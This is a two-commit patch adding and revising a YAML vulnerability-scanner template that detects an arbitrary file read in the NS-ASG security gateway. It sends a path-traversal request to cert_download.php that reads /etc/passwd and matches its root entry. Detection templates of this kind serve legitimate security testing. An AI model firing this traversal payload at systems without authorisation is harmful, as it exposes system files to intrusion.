From e56a64402cce02dfa79ab4aabd46d399ebb2b4c8 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 31 May 2021 08:56:01 +0000
Subject: [PATCH 1/2] Create ns-asg-file-read.yaml

---
 vulnerabilities/other/ns-asg-file-read.yaml | 26 +++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 vulnerabilities/other/ns-asg-file-read.yaml

diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml
new file mode 100644
index 0000000000..8fb79f6637
--- /dev/null
+++ b/vulnerabilities/other/ns-asg-file-read.yaml
@@ -0,0 +1,26 @@
+id: ns-asg-file-read
+
+info:
+  name: NS ASG File Read
+  author: pikpikcu
+  severity: high
+  reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  tags: ns-asg,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
+      - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+          - "$certfile"
+
+      - type: status
+        status:
+          - 200

From d5b9e4c7b6262e634b5d338eda9dc395abc77d27 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Tue, 1 Jun 2021 14:09:01 +0530
Subject: [PATCH 2/2] Update ns-asg-file-read.yaml

---
 vulnerabilities/other/ns-asg-file-read.yaml | 9 +++------
 1 file changed, 3 insertions(+), 6 deletions(-)

diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml
index 8fb79f6637..66e112d2de 100644
--- a/vulnerabilities/other/ns-asg-file-read.yaml
+++ b/vulnerabilities/other/ns-asg-file-read.yaml
@@ -1,16 +1,14 @@
-id: ns-asg-file-read
+id: nsasg-arbitrary-file-read
 
 info:
-  name: NS ASG File Read
+  name: NS ASG Arbitrary File Read
   author: pikpikcu
   severity: high
-  reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
-  tags: ns-asg,lfi
+  tags: nsasg,lfi
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
       - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
 
     matchers-condition: and
@@ -19,7 +17,6 @@ requests:
       - type: regex
         regex:
           - "root:[x*]:0:0"
-          - "$certfile"
 
       - type: status
         status: